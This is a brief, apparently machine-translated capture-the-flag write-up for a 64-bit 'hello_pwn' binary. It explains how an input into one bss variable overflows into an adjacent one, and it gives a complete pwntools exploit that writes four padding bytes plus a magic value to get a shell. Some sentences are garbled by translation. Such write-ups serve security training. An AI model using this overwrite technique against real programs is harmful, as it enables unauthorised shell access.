Starting to blog: Portal
0x00 Foreword
file checksec has been omitted. 64 elf program
0x10 steps
0x11 main function
In the main function, we can see that it allows us to enter value unk_601068, and if we want getshell, then we need to dword_60106c value assigned to 1,853,186,401.
0x11 bss segment observation
You can see from these two data it is not far away, so when we entered the first time a two-point values, we will be able to enter four unrelated data, and then packaged value of 1,853,186,401 issued dword. I.e. payload is a payload = 'a' * 4 + p64 (1853186401)
0x20 exp
from pwn import *
sh = process("./hello_pwn")
payload = 'a'*4+p64(1853186401)
sh.recvuntil("bof")
sh.sendline(payload)
sh.interactive()